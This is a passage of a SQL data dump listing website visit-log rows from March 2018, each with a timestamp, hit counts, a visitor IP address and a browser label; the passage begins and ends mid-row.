,1,1,0,0,'54.36.149.29','other'),(223994,1521711325,2,2,0,0,'141.8.142.74','other'),(223995,1521711488,3,3,0,0,'91.196.178.169','chrome'),(223996,1521711610,1,1,0,0,'54.36.148.217','other'),(223997,1521711630,1,1,0,0,'91.196.179.33','chrome'),(223998,1521711856,2,2,0,0,'37.54.114.62','chrome'),(223999,1521711999,1,1,0,0,'157.55.39.148','other'),(224000,1521712044,4,4,0,0,'46.211.101.159','chrome'),(224001,1521712188,1,1,0,0,'54.210.107.179','other'),(224002,1521712343,2,2,0,0,'141.8.142.74','other'),(224003,1521712538,1,1,0,0,'91.196.178.136','firefox'),(224004,1521712833,1,1,0,0,'54.36.149.20','other'),(224005,1521712834,1,1,0,0,'54.36.148.127','other'),(224006,1521712975,1,1,0,0,'207.46.13.133','other'),(224007,1521713110,1,1,0,0,'54.36.148.126','other'),(224008,1521713132,1,1,0,0,'54.36.148.23','other'),(224009,1521713341,1,1,0,0,'178.154.171.88','other'),(224010,1521713404,1,1,0,0,'195.69.222.18','chrome'),(224011,1521713428,6,6,0,0,'5.9.111.70','other'),(224012,1521713503,1,1,0,0,'54.36.148.84','other'),(224013,1521713571,1,1,0,0,'54.36.149.6','other'),(224014,1521713703,1,1,0,0,'54.36.148.206','other'),(224015,1521713851,1,1,0,0,'54.36.148.220','other'),(224016,1521713886,2,2,0,0,'77.111.244.13','chrome'),(224017,1521714040,1,1,0,0,'141.8.142.74','other'),(224018,1521714227,1,1,0,0,'54.36.148.111','other'),(224019,1521714738,1,1,0,0,'54.36.149.78','other'),(224020,1521714934,1,1,0,0,'54.36.148.21','other'),(224021,1521715104,1,1,0,0,'54.36.149.41','other'),(224022,1521715128,1,1,0,0,'54.210.107.179','other'),(224023,1521715226,2,2,0,0,'130.180.219.231','chrome'),(224024,1521715360,1,1,0,0,'8.29.198.26','other'),(224025,1521715640,1,1,0,0,'54.36.148.209','other'),(224026,1521715674,2,2,0,0,'91.196.178.77','chrome'),(224027,1521715767,1,1,0,0,'54.36.148.30','other'),(224028,1521715787,1,1,0,0,'46.201.240.112','chrome'),(224029,1521715828,1,1,0,0,'216.244.66.237','other'),(224030,1521716281,1,0,1,0,'66.249.66.158',''),(224031,1521716710,1,1,0,0,'54.210.107.179','other'),(224032,1521716807,1,1,0,0,'54.36.148.52','other'),(224033,1521717364,2,2,0,0,'216.244.66.237','other'),(224034,1521717510,15,15,0,0,'23.237.4.26','other'),(224035,1521717586,1,1,0,0,'54.36.149.11','other'),(224036,1521717739,1,1,0,0,'54.36.148.218','other'),(224037,1521717984,1,1,0,0,'54.36.148.116','other'),(224038,1521718188,1,1,0,0,'54.210.107.179','other'),(224039,1521718212,1,1,0,0,'54.36.148.179','other'),(224040,1521718616,1,1,0,0,'54.36.148.200','other'),(224041,1521718626,1,1,0,0,'54.36.148.50','other'),(224042,1521718807,1,1,0,0,'54.36.148.22','other'),(224043,1521719026,2,2,0,0,'91.196.177.46','chrome'),(224044,1521719214,2,2,0,0,'141.8.142.74','other'),(224045,1521719449,1,1,0,0,'54.36.149.13','other'),(224046,1521719620,1,1,0,0,'54.36.149.12','other'),(224047,1521719705,1,1,0,0,'54.36.148.239','other'),(224048,1521719715,1,1,0,0,'95.132.2.117','firefox'),(224049,1521719722,1,1,0,0,'54.210.107.179','other'),(224050,1521719910,1,1,0,0,'54.36.149.67','other'),(224051,1521719978,2,2,0,0,'54.36.149.22','other'),(224052,1521720019,1,1,0,0,'54.36.148.214','other'),(224053,1521720090,1,1,0,0,'91.196.178.97','chrome'),(224054,1521720117,1,1,0,0,'94.178.119.57','firefox'),(224055,1521720590,1,1,0,0,'216.244.66.237','other'),(224056,1521720668,1,1,0,0,'54.36.148.231','other'),(224057,1521720764,1,1,0,0,'54.36.149.11','other'),(224058,1521720862,1,1,0,0,'54.36.148.229','other'),(224059,1521721150,1,1,0,0,'54.210.107.179','other'),(224060,1521721275,1,1,0,0,'95.132.2.117','firefox'),(224061,1521721311,1,1,0,0,'54.36.149.15','other'),(224062,1521721313,1,1,0,0,'149.154.167.165','other'),(224063,1521721412,1,1,0,0,'54.36.149.33','other'),(224064,1521721431,1,1,0,0,'54.36.149.5','other'),(224065,1521721499,1,1,0,0,'46.211.96.229','other'),(224066,1521721785,1,1,0,0,'178.154.171.88','other'),(224067,1521721939,1,1,0,0,'92.113.34.152','chrome'),(224068,1521722581,1,1,0,0,'54.36.149.21','other'),(224069,1521722715,1,1,0,0,'91.196.178.97','chrome'),(224070,1521722745,1,1,0,0,'54.210.107.179','other'),(224071,1521722889,1,1,0,0,'178.154.171.88','other'),(224072,1521722916,1,1,0,0,'54.36.148.202','other'),(224073,1521723158,1,1,0,0,'66.249.66.199','chrome'),(224074,1521723294,1,1,0,0,'54.36.148.104','other'),(224075,1521723868,2,2,0,0,'77.111.244.27','chrome'),(224076,1521724180,1,1,0,0,'54.36.148.44','other'),(224077,1521724198,1,1,0,0,'54.210.107.179','other'),(224078,1521724512,2,2,0,0,'91.196.178.77','chrome'),(224079,1521724719,1,1,0,0,'54.36.148.152','other'),(224080,1521724742,1,1,0,0,'54.36.148.11','other'),(224081,1521724787,1,1,0,0,'141.8.142.74','other'),(224082,1521724847,1,1,0,0,'95.132.2.117','firefox'),(224083,1521725027,1,1,0,0,'54.36.148.184','other'),(224084,1521725284,2,2,0,0,'178.154.171.88','other'),(224085,1521725361,4,4,0,0,'46.133.200.90','chrome'),(224086,1521725474,1,1,0,0,'54.36.149.7','other'),(224087,1521725706,1,1,0,0,'54.210.107.179','other'),(224088,1521726118,2,2,0,0,'91.196.178.132','chrome'),(224089,1521726162,1,1,0,0,'180.76.15.22','other'),(224090,1521726205,1,1,0,0,'8.29.198.27','other'),(224091,1521726343,1,1,0,0,'54.36.149.16','other'),(224092,1521726430,2,2,0,0,'91.196.178.77','chrome'),(224093,1521726778,1,1,0,0,'54.191.50.119','chrome'),(224094,1521726809,1,1,0,0,'54.36.148.157','other'),(224095,1521727176,1,1,0,0,'141.8.142.74','other'),(224096,1521727196,1,1,0,0,'54.210.107.179','other'),(224097,1521727370,2,2,0,0,'91.196.178.74','chrome'),(224098,1521727400,1,1,0,0,'62.205.134.182','msie'),(224099,1521727458,1,1,0,0,'94.179.174.142','opera'),(224100,1521727806,1,1,0,0,'54.36.148.63','other'),(224101,1521727812,2,2,0,0,'54.36.148.23','other'),(224102,1521727835,1,1,0,0,'178.154.171.88','other'),(224103,1521728027,1,1,0,0,'54.36.148.167','other'),(224104,1521728147,1,1,0,0,'54.36.148.160','other'),(224105,1521728247,1,1,0,0,'54.36.148.159','other'),(224106,1521728712,1,1,0,0,'54.36.149.95','other'),(224107,1521729439,1,1,0,0,'54.36.148.66','other'),(224108,1521729582,1,1,0,0,'54.36.148.130','other'),(224109,1521729586,2,2,0,0,'54.36.148.162','other'),(224110,1521729624,1,1,0,0,'178.154.171.88','other'),(224111,1521729860,1,1,0,0,'54.36.148.183','other'),(224112,1521729880,1,1,0,0,'54.36.148.20','other'),(224113,1521730196,1,1,0,0,'54.210.107.179','other'),(224114,1521730257,1,1,0,0,'92.113.12.236','chrome'),(224115,1521730501,1,1,0,0,'54.36.148.111','other'),(224116,1521730682,2,2,0,0,'141.8.142.74','other'),(224117,1521730747,1,1,0,0,'54.36.148.110','other'),(224118,1521731009,1,1,0,0,'54.36.149.64','other'),(224119,1521731087,1,1,0,0,'77.111.244.36','chrome'),(224120,1521731179,1,1,0,0,'54.36.148.44','other'),(224121,1521731269,1,1,0,0,'37.54.226.93','firefox'),(224122,1521731283,1,1,0,0,'91.225.4.17','chrome'),(224123,1521731574,1,1,0,0,'216.244.66.237','other'),(224124,1521731731,1,1,0,0,'54.210.107.179','other'),(224125,1521731849,1,1,0,0,'54.36.148.102','other'),(224126,1521731851,1,1,0,0,'54.36.149.57','other'),(224127,1521731929,2,2,0,0,'91.196.178.22','chrome'),(224128,1521731931,2,2,0,0,'91.196.179.33','chrome'),(224129,1521732510,1,1,0,0,'54.36.148.218','other'),(224130,1521732603,1,1,0,0,'54.36.148.196','other'),(224131,1521733051,1,1,0,0,'54.36.148.43','other'),(224132,1521733065,1,1,0,0,'91.199.93.129','chrome'),(224133,1521733333,1,1,0,0,'54.36.149.19','other'),(224134,1521733334,1,1,0,0,'54.210.107.179','other'),(224135,1521733352,1,1,0,0,'54.36.148.15','other'),(224136,1521733387,1,1,0,0,'188.230.43.254','other'),(224137,1521733421,2,2,0,0,'178.154.171.88','other'),(224138,1521733820,1,1,0,0,'217.69.133.69','other'),(224139,1521733823,2,2,0,0,'91.196.179.33','chrome'),(224140,1521733974,1,1,0,0,'54.36.148.232','other'),(224141,1521734385,1,1,0,0,'54.36.148.12','other'),(224142,1521734414,2,2,0,0,'92.113.174.6','chrome'),(224143,1521734580,1,1,0,0,'54.36.148.239','other'),(224144,1521734669,1,1,0,0,'54.36.148.208','other'),(224145,1521734674,1,1,0,0,'54.36.148.150','other'),(224146,1521734721,1,1,0,0,'54.36.149.80','other'),(224147,1521734830,1,1,0,0,'54.210.107.179','other'),(224148,1521734987,2,2,0,0,'80.240.128.62','chrome'),(224149,1521735109,1,1,0,0,'54.36.148.189','other'),(224150,1521735149,1,1,0,0,'54.36.148.133','other'),(224151,1521735455,1,1,0,0,'54.36.148.101','other'),(224152,1521735497,1,1,0,0,'54.36.148.200','other'),(224153,1521735500,1,1,0,0,'54.36.148.141','other'),(224154,1521735603,1,1,0,0,'54.36.148.146','other'),(224155,1521735736,1,1,0,0,'54.36.148.61','other'),(224156,1521735785,1,1,0,0,'5.9.156.43','other'),(224157,1521735786,1,1,0,0,'188.230.43.254','other'),(224158,1521735969,1,1,0,0,'54.36.149.79','other'),(224159,1521736191,1,1,0,0,'54.36.149.31','other'),(224160,1521736274,1,1,0,0,'54.36.148.22','other'),(224161,1521736308,1,1,0,0,'54.210.107.179','other'),(224162,1521736333,1,1,0,0,'54.36.148.239','other'),(224163,1521736358,1,1,0,0,'128.199.41.16','chrome'),(224164,1521736407,1,1,0,0,'31.13.112.133','other'),(224165,1521736420,1,1,0,0,'91.196.177.46','chrome'),(224166,1521736442,1,1,0,0,'31.13.113.86','other'),(224167,1521736479,1,1,0,0,'31.13.114.145','other'),(224168,1521736527,1,1,0,0,'178.154.171.88','other'),(224169,1521736531,1,1,0,0,'141.8.142.74','other'),(224170,1521736581,1,1,0,0,'54.36.149.98','other'),(224171,1521736609,1,1,0,0,'54.36.148.120','other'),(224172,1521736639,1,1,0,0,'54.36.148.45','other'),(224173,1521736738,1,1,0,0,'77.111.244.30','chrome'),(224174,1521737051,1,1,0,0,'92.112.249.141','chrome'),(224175,1521737057,1,1,0,0,'8.29.198.25','other'),(224176,1521737071,1,1,0,0,'54.36.148.10','other'),(224177,1521737224,2,2,0,0,'91.196.178.33','chrome'),(224178,1521737481,1,1,0,0,'178.154.171.88','other'),(224179,1521737515,1,1,0,0,'91.196.178.164','other'),(224180,1521737607,1,1,0,0,'178.92.157.92','other'),(224181,1521737654,1,1,0,0,'54.36.148.50','other'),(224182,1521737706,1,0,1,0,'66.249.66.195',''),(224183,1521737851,1,1,0,0,'54.210.107.179','other'),(224184,1521737875,1,1,0,0,'54.36.148.211','other'),(224185,1521738043,1,1,0,0,'54.36.148.126','other'),(224186,1521738113,1,1,0,0,'95.134.220.64','other'),(224187,1521738593,1,1,0,0,'87.250.224.46','other'),(224188,1521738814,1,1,0,0,'54.36.148.51','other'),(224189,1521739094,1,1,0,0,'54.36.149.56','other'),(224190,1521739209,1,1,0,0,'46.149.176.115','chrome'),(224191,1521739317,1,1,0,0,'54.210.107.179','other'),(224192,1521740192,1,1,0,0,'54.36.148.49','other'),(224193,1521740316,1,1,0,0,'216.244.66.237','other'),(224194,1521740326,1,1,0,0,'54.36.149.86','other'),(224195,1521740423,4,4,0,0,'91.196.178.103','chrome'),(224196,1521740875,1,1,0,0,'54.36.148.96','other'),(224197,1521740881,1,1,0,0,'54.210.107.179','other'),(224198,1521741145,1,1,0,0,'91.196.178.80','firefox'),(224199,1521741339,1,1,0,0,'216.244.66.237','other'),(224200,1521741448,2,2,0,0,'37.73.210.199','chrome'),(224201,1521741911,1,1,0,0,'91.196.178.53','chrome'),(224202,1521741964,1,1,0,0,'54.36.148.194','other'),(224203,1521742180,1,1,0,0,'54.36.148.124','other'),(224204,1521742287,1,1,0,0,'37.73.244.130','chrome'),(224205,1521742336,1,1,0,0,'54.210.107.179','other'),(224206,1521742348,2,2,0,0,'91.196.178.103','chrome'),(224207,1521742600,1,1,0,0,'54.36.148.135','other'),(224208,1521742634,1,1,0,0,'91.196.178.88','chrome'),(224209,1521742781,1,1,0,0,'91.196.177.36','chrome'),(224210,1521742867,1,1,0,0,'178.95.158.242','chrome'),(224211,1521742869,1,1,0,0,'54.36.149.24','other'),(224212,1521743014,1,1,0,0,'54.36.148.35','other'),(224213,1521743229,1,1,0,0,'216.244.66.237','other'),(224214,1521743300,1,1,0,0,'54.36.148.42','other'),(224215,1521743577,1,1,0,0,'54.36.148.30','other'),(224216,1521743708,1,1,0,0,'176.36.127.46','chrome'),(224217,1521743854,2,2,0,0,'141.8.142.74','other'),(224218,1521743867,1,1,0,0,'54.36.149.11','other'),(224219,1521744134,1,1,0,0,'54.36.148.33','other'),(224220,1521744413,1,1,0,0,'178.154.171.88','other'),(224221,1521744497,1,1,0,0,'92.113.190.209','chrome'),(224222,1521744515,1,1,0,0,'54.36.148.134','other'),(224223,1521744791,1,1,0,0,'37.55.58.45','chrome'),(224224,1521744909,1,1,0,0,'54.36.148.145','other'),(224225,1521745074,1,1,0,0,'95.133.238.130','chrome'),(224226,1521745199,2,2,0,0,'91.196.178.163','chrome'),(224227,1521745204,1,1,0,0,'54.36.148.231','other'),(224228,1521745315,2,2,0,0,'95.134.185.233','chrome'),(224229,1521745399,1,1,0,0,'54.36.149.11','other'),(224230,1521745417,1,1,0,0,'195.10.210.49','chrome'),(224231,1521745436,1,1,0,0,'54.36.148.159','other'),(224232,1521745477,1,1,0,0,'91.196.177.33','other'),(224233,1521745483,1,1,0,0,'54.210.107.179','other'),(224234,1521745947,2,0,2,0,'66.249.66.156',''),(224235,1521746437,1,1,0,0,'54.36.148.189','other'),(224236,1521746761,1,1,0,0,'188.166.91.90','other'),(224237,1521747047,1,1,0,0,'54.210.107.179','other'),(224238,1521747345,1,1,0,0,'54.36.149.45','other'),(224239,1521747360,1,1,0,0,'46.133.254.29','other'),(224240,1521747896,1,1,0,0,'40.77.167.33','other'),(224241,1521747922,1,1,0,0,'8.29.198.26','other'),(224242,1521748329,1,1,0,0,'141.8.142.74','other'),(224243,1521748448,1,0,1,0,'66.249.66.199',''),(224244,1521748605,1,1,0,0,'178.154.171.88','other'),(224245,1521748646,1,1,0,0,'54.210.107.179','other'),(224246,1521748697,1,1,0,0,'54.36.149.105','other'),(224247,1521748844,1,1,0,0,'95.132.39.147','chrome'),(224248,1521748879,2,2,0,0,'91.196.178.103','chrome'),(224249,1521749302,3,3,0,0,'91.196.178.14','chrome'),(224250,1521749320,1,1,0,0,'216.244.66.237','other'),(224251,1521749340,1,1,0,0,'46.211.156.86','chrome'),(224252,1521749417,2,2,0,0,'91.196.178.35','chrome'),(224253,1521749583,1,1,0,0,'54.36.148.108','other'),(224254,1521749604,1,1,0,0,'54.36.148.183','other'),(224255,1521749716,1,1,0,0,'95.108.213.24','other'),(224256,1521749719,1,1,0,0,'87.250.224.46','other'),(224257,1521749964,1,1,0,0,'54.36.148.222','other'),(224258,1521749984,1,1,0,0,'54.36.148.176','other'),(224259,1521750163,1,1,0,0,'54.210.107.179','other'),(224260,1521750421,1,1,0,0,'141.8.142.74','other'),(224261,1521750598,1,1,0,0,'54.36.148.45','other'),(224262,1521750613,1,1,0,0,'216.244.66.194','other'),(224263,1521750644,1,1,0,0,'54.36.148.218','other'),(224264,1521750875,1,1,0,0,'54.36.148.98','other'),(224265,1521750971,1,1,0,0,'54.36.149.75','other'),(224266,1521751206,1,1,0,0,'95.134.170.9','other'),(224267,1521751322,1,1,0,0,'54.36.148.75','other'),(224268,1521751779,1,1,0,0,'54.210.107.179','other'),(224269,1521751965,1,1,0,0,'54.36.148.235','other'),(224270,1521752089,1,1,0,0,'54.36.149.61','other'),(224271,1521752114,1,1,0,0,'54.36.148.43','other'),(224272,1521752132,1,1,0,0,'54.36.148.47','other'),(224273,1521752380,1,1,0,0,'54.36.148.66','other'),(224274,1521752388,2,2,0,0,'76.106.206.183','other'),(224275,1521752526,1,1,0,0,'141.8.142.74','other'),(224276,1521752536,1,1,0,0,'54.36.148.238','other'),(224277,1521752579,1,1,0,0,'54.36.149.95','other'),(224278,1521752969,1,1,0,0,'54.36.149.21','other'),(224279,1521752982,1,1,0,0,'54.36.148.185','other'),(224280,1521753169,1,1,0,0,'54.36.148.90','other'),(224281,1521753318,1,1,0,0,'54.210.107.179','other'),(224282,1521753618,1,1,0,0,'54.36.148.225','other'),(224283,1521753670,1,1,0,0,'54.36.148.27','other'),(224284,1521753748,1,1,0,0,'46.133.242.133','chrome'),(224285,1521753767,1,1,0,0,'54.36.148.214','other'),(224286,1521753844,1,1,0,0,'54.36.148.245','other'),(224287,1521754073,1,1,0,0,'216.244.66.237','other'),(224288,1521754523,1,1,0,0,'54.36.148.250','other'),(224289,1521754558,1,1,0,0,'54.36.149.88','other'),(224290,1521754564,1,1,0,0,'54.36.149.19','other'),(224291,1521754928,1,1,0,0,'54.210.107.179','other'),(224292,1521755141,1,1,0,0,'54.36.148.47','other'),(224293,1521755144,1,1,0,0,'54.36.148.124','other'),(224294,1521755153,1,1,0,0,'54.36.149.27','other'),(224295,1521755733,1,1,0,0,'54.36.148.156','other'),(224296,1521755734,1,1,0,0,'54.36.149.41','other'),(224297,1521755822,1,1,0,0,'46.211.156.193','chrome'),(224298,1521756057,1,1,0,0,'54.36.148.210','other'),(224299,1521756131,1,1,0,0,'54.36.148.166','other'),(224300,1521756227,1,1,0,0,'136.243.68.226','other'),(224301,1521756339,1,1,0,0,'54.210.107.179','other'),(224302,1521756582,1,1,0,0,'157.55.39.209','other'),(224303,1521756664,1,1,0,0,'37.73.236.213','other'),(224304,1521756672,1,1,0,0,'54.36.148.185','other'),(224305,1521756809,1,1,0,0,'54.36.148.189','other'),(224306,1521756858,1,1,0,0,'54.36.148.183','other'),(224307,1521757320,1,1,0,0,'54.36.149.13','other'),(224308,1521757537,1,1,0,0,'194.187.170.112','other'),(224309,1521757590,1,1,0,0,'54.36.149.89','other'),(224310,1521757703,1,1,0,0,'216.244.66.237','other'),(224311,1521757860,1,1,0,0,'54.210.107.179','other'),(224312,1521757882,1,1,0,0,'37.73.208.228','other'),(224313,1521758094,1,1,0,0,'54.36.149.59','other'),(224314,1521758168,1,1,0,0,'54.36.148.208','other'),(224315,1521758255,1,1,0,0,'54.36.149.68','other'),(224316,1521758455,1,1,0,0,'54.36.148.178','other'),(224317,1521758763,1,1,0,0,'8.29.198.26','other'),(224318,1521759363,1,1,0,0,'54.36.149.85','other'),(224319,1521759703,1,1,0,0,'54.36.149.92','other'),(224320,1521760073,1,1,0,0,'54.36.148.225','other'),(224321,1521760661,1,1,0,0,'54.36.148.99','other'),(224322,1521760907,1,1,0,0,'54.210.107.179','other'),(224323,1521760988,1,1,0,0,'54.36.148.100','other'),(224324,1521761128,1,1,0,0,'54.36.148.176','other'),(224325,1521761401,1,1,0,0,'54.36.149.105','other'),(224326,1521761516,1,1,0,0,'54.36.148.81','other'),(224327,1521761635,1,1,0,0,'54.36.148.208','other'),(224328,1521761885,1,1,0,0,'54.36.149.79','other'),(224329,1521762013,1,1,0,0,'54.36.148.123','other'),(224330,1521762110,1,1,0,0,'91.196.178.50','other'),(224331,1521762289,1,1,0,0,'54.36.148.111','other'),(224332,1521762537,1,1,0,0,'54.210.107.179','other'),(224333,1521762735,1,1,0,0,'54.36.149.53','other'),(224334,1521762891,1,1,0,0,'54.36.148.219','other'),(224335,1521763059,1,1,0,0,'54.36.148.73','other'),(224336,1521763861,1,1,0,0,'54.36.149.15','other'),(224337,1521763960,1,1,0,0,'54.210.107.179','other'),(224338,1521764153,1,1,0,0,'54.36.149.74','other'),(224339,1521764805,1,1,0,0,'54.36.148.236','other'),(224340,1521764970,1,1,0,0,'54.87.228.178','other'),(224341,1521765234,1,0,1,0,'66.249.66.199',''),(224342,1521765240,1,1,0,0,'13.59.15.238','chrome'),(224343,1521765400,1,1,0,0,'54.210.107.179','other'),(224344,1521765444,1,1,0,0,'216.244.66.237','other'),(224345,1521765584,1,1,0,0,'54.36.148.25','other'),(224346,1521765721,1,1,0,0,'54.36.148.152','other'),(224347,1521765772,1,1,0,0,'54.36.148.222','other'),(224348,1521765980,1,1,0,0,'54.36.148.52','other'),(224349,1521766294,1,1,0,0,'157.55.39.209','other'),(224350,1521766531,1,1,0,0,'54.36.148.144','other'),(224351,1521766566,1,1,0,0,'54.36.149.21','other'),(224352,1521766705,1,1,0,0,'216.244.66.237','other'),(224353,1521766745,1,1,0,0,'54.36.148.166','other'),(224354,1521766865,1,1,0,0,'54.210.107.179','other'),(224355,1521767265,1,1,0,0,'54.36.148.155','other'),(224356,1521767400,1,1,0,0,'54.36.148.64','other'),(224357,1521767530,1,1,0,0,'54.36.148.211','other'),(224358,1521767780,1,1,0,0,'54.36.149.82','other'),(224359,1521768269,1,1,0,0,'54.36.148.180','other'),(224360,1521768341,1,1,0,0,'54.210.107.179','other'),(224361,1521768489,2,2,0,0,'54.36.148.228','other'),(224362,1521768578,1,1,0,0,'54.36.148.164','other'),(224363,1521768884,1,1,0,0,'54.36.148.140','other'),(224364,1521769205,1,1,0,0,'95.108.213.24','other'),(224365,1521769208,1,1,0,0,'87.250.224.66','other'),(224366,1521769484,1,1,0,0,'54.36.148.23','other'),(224367,1521769608,1,1,0,0,'8.29.198.26','other'),(224368,1521769711,1,1,0,0,'54.36.148.195','other'),(224369,1521770186,1,1,0,0,'216.244.66.237','other'),(224370,1521770816,1,1,0,0,'54.36.148.152','other'),(224371,1521771006,1,1,0,0,'54.36.148.15','other'),(224372,1521771337,1,1,0,0,'54.36.148.30','other'),(224373,1521771367,1,1,0,0,'54.36.149.104','other'),(224374,1521771793,1,1,0,0,'54.36.148.65','other'),(224375,1521772036,1,1,0,0,'216.244.66.237','other'),(224376,1521772299,1,1,0,0,'54.36.149.96','other'),(224377,1521772313,1,1,0,0,'54.36.148.165','other'),(224378,1521772406,1,1,0,0,'54.36.149.107','other'),(224379,1521772438,1,1,0,0,'54.36.148.78','other'),(224380,1521772450,1,1,0,0,'54.36.149.77','other'),(224381,1521772478,1,1,0,0,'54.36.149.60','other'),(224382,1521772487,1,1,0,0,'54.36.149.80','other'),(224383,1521772608,1,1,0,0,'54.36.149.35','other'),(224384,1521772638,1,1,0,0,'54.36.148.83','other'),(224385,1521772846,1,1,0,0,'54.36.148.88','other'),(224386,1521772896,1,1,0,0,'54.36.149.24','other'),(224387,1521772917,1,1,0,0,'54.36.148.234','other'),(224388,1521773205,1,1,0,0,'180.76.15.14','other'),(224389,1521773490,1,1,0,0,'54.36.148.85','other'),(224390,1521773518,1,1,0,0,'54.36.149.95','other'),(224391,1521773612,1,1,0,0,'54.36.149.22','other'),(224392,1521774046,1,1,0,0,'54.36.148.31','other'),(224393,1521774290,1,1,0,0,'54.89.27.245','other'),(224394,1521775008,2,2,0,0,'216.244.66.246','other'),(224395,1521775091,1,1,0,0,'54.36.148.236','other'),(224396,1521775211,1,1,0,0,'54.89.27.245','other'),(224397,1521775604,1,1,0,0,'54.36.148.147','other'),(224398,1521775662,1,1,0,0,'54.36.148.207','other'),(224399,1521775686,1,1,0,0,'54.36.148.148','other'),(224400,1521775969,1,1,0,0,'54.36.149.79','other'),(224401,1521776041,1,1,0,0,'141.8.142.74','other'),(224402,1521776158,1,1,0,0,'54.89.27.245','other'),(224403,1521776249,1,1,0,0,'54.36.149.21','other'),(224404,1521777086,1,1,0,0,'54.89.27.245','other'),(224405,1521777459,2,2,0,0,'54.36.149.49','other'),(224406,1521777676,1,1,0,0,'54.36.149.56','other'),(224407,1521777988,1,1,0,0,'54.89.27.245','other'),(224408,1521778081,1,1,0,0,'54.36.148.152','other'),(224409,1521778272,1,1,0,0,'54.36.149.22','other'),(224410,1521778572,8,8,0,0,'141.8.142.74','other'),(224411,1521778581,1,1,0,0,'178.154.171.88','other'),(224412,1521778847,1,1,0,0,'54.36.149.90','other'),(224413,1521778918,1,1,0,0,'54.89.27.245','other'),(224414,1521779225,1,1,0,0,'91.196.178.132','chrome'),(224415,1521779313,1,1,0,0,'54.36.149.16','other'),(224416,1521779571,1,1,0,0,'87.250.224.46','other'),(224417,1521779573,1,1,0,0,'141.8.142.74','other'),(224418,1521779575,2,2,0,0,'178.154.171.88','other'),(224419,1521779633,1,1,0,0,'54.36.148.41','other'),(224420,1521779650,1,1,0,0,'54.36.148.11','other'),(224421,1521779745,1,1,0,0,'54.36.149.12','other'),(224422,1521779835,1,1,0,0,'54.89.27.245','other'),(224423,1521779846,1,1,0,0,'5.9.111.70','other'),(224424,1521779938,1,1,0,0,'54.36.148.247','other'),(224425,1521779964,1,1,0,0,'66.249.75.155','chrome'),(224426,1521780164,1,1,0,0,'54.36.149.3','other'),(224427,1521780315,1,1,0,0,'54.36.148.194','other'),(224428,1521780336,1,1,0,0,'54.36.149.29','other'),(224429,1521780404,1,1,0,0,'54.36.149.88','other'),(224430,1521780451,1,1,0,0,'8.29.198.26','other'),(224431,1521780495,1,1,0,0,'54.36.148.48','other'),(224432,1521780668,1,1,0,0,'91.196.178.84','chrome'),(224433,1521780694,1,1,0,0,'54.36.148.219','other'),(224434,1521780763,1,1,0,0,'54.89.27.245','other'),(224435,1521780829,1,1,0,0,'54.36.148.150','other'),(224436,1521780893,1,1,0,0,'54.36.148.13','other'),(224437,1521780992,1,1,0,0,'213.5.192.218','chrome'),(224438,1521781418,1,1,0,0,'54.36.148.56','other'),(224439,1521781677,1,1,0,0,'54.89.27.245','other'),(224440,1521781883,1,0,1,0,'66.249.69.145',''),(224441,1521781978,2,2,0,0,'54.165.59.7','other'),(224442,1521781990,1,1,0,0,'54.36.149.1','other'),(224443,1521782013,1,1,0,0,'91.196.178.88','chrome'),(224444,1521782029,1,1,0,0,'54.36.149.52','other'),(224445,1521782318,1,1,0,0,'54.36.148.189','other'),(224446,1521782562,1,1,0,0,'37.73.159.243','chrome'),(224447,1521782581,1,1,0,0,'54.89.27.245','other'),(224448,1521782816,1,1,0,0,'54.36.148.211','other'),(224449,1521783123,1,1,0,0,'91.196.178.101','chrome'),(224450,1521783351,1,1,0,0,'54.36.148.128','other'),(224451,1521783502,1,1,0,0,'54.89.27.245','other'),(224452,1521783538,1,1,0,0,'95.158.2.61','chrome'),(224453,1521783656,1,1,0,0,'37.73.248.237','chrome'),(224454,1521784119,1,1,0,0,'54.36.148.180','other'),(224455,1521784388,1,1,0,0,'54.36.148.83','other'),(224456,1521784445,1,1,0,0,'54.89.27.245','other'),(224457,1521784516,1,1,0,0,'54.36.149.55','other'),(224458,1521784940,1,1,0,0,'54.36.148.121','other'),(224459,1521785335,1,0,1,0,'66.249.75.157',''),(224460,1521785364,1,1,0,0,'54.89.27.245','other'),(224461,1521785436,1,1,0,0,'91.196.178.88','other'),(224462,1521785664,1,1,0,0,'66.249.69.143','chrome'),(224463,1521785752,1,1,0,0,'54.36.149.84','other'),(224464,1521785937,2,0,2,0,'66.249.75.155',''),(224465,1521786023,1,1,0,0,'54.36.148.48','other'),(224466,1521786093,1,1,0,0,'54.36.148.221','other'),(224467,1521786222,1,1,0,0,'77.111.244.50','chrome'),(224468,1521786283,1,1,0,0,'54.89.27.245','other'),(224469,1521786287,3,3,0,0,'144.76.12.66','other'),(224470,1521786360,1,1,0,0,'79.220.163.96','other'),(224471,1521786395,1,1,0,0,'54.36.148.92','other'),(224472,1521786449,1,1,0,0,'54.36.148.83','other'),(224473,1521786495,1,1,0,0,'54.36.148.156','other'),(224474,1521786563,1,1,0,0,'54.36.148.117','other'),(224475,1521786631,1,1,0,0,'54.36.148.137','other'),(224476,1521786663,1,1,0,0,'54.36.148.141','other'),(224477,1521787003,1,1,0,0,'92.113.7.126','chrome'),(224478,1521787194,1,1,0,0,'54.89.27.245','other'),(224479,1521787328,1,1,0,0,'54.36.148.248','other'),(224480,1521787365,1,1,0,0,'54.36.148.201','other'),(224481,1521787431,1,1,0,0,'54.36.149.85','other'),(224482,1521787435,1,1,0,0,'77.111.244.19','chrome'),(224483,1521787720,1,1,0,0,'216.244.66.237','other'),(224484,1521788107,1,1,0,0,'54.89.27.245','other'),(224485,1521788161,1,1,0,0,'37.73.248.237','chrome'),(224486,1521788536,1,1,0,0,'54.36.149.7','other'),(224487,1521788615,1,1,0,0,'54.36.148.57','other'),(224488,1521788630,1,1,0,0,'54.36.148.29','other'),(224489,1521788646,1,1,0,0,'194.25.170.138','chrome'),(224490,1521789025,1,1,0,0,'54.89.27.245','other'),(224491,1521789033,1,1,0,0,'195.77.80.87','other'),(224492,1521789330,1,0,1,0,'66.249.69.144',''),(224493,1521789490,2,2,0,0,'80.240.128.221','chrome'),(224494,1521789536,1,1,0,0,'46.141.43.232','chrome'),(224495,1521789941,1,1,0,0,'54.89.27.245','other'),(224496,1521790386,1,1,0,0,'93.73.111.185','other'),(224497,1521790427,1,1,0,0,'91.203.26.166','chrome'),(224498,1521790547,1,1,0,0,'54.36.148.111','other'),(224499,1521790602,1,1,0,0,'54.36.148.167','other'),(224500,1521790729,1,1,0,0,'80.240.128.221','chrome'),(224501,1521790859,2,2,0,0,'54.89.27.245','other'),(224502,1521790999,1,1,0,0,'91.196.178.97','chrome'),(224503,1521791308,1,1,0,0,'8.29.198.27','other'),(224504,1521791405,1,1,0,0,'54.36.148.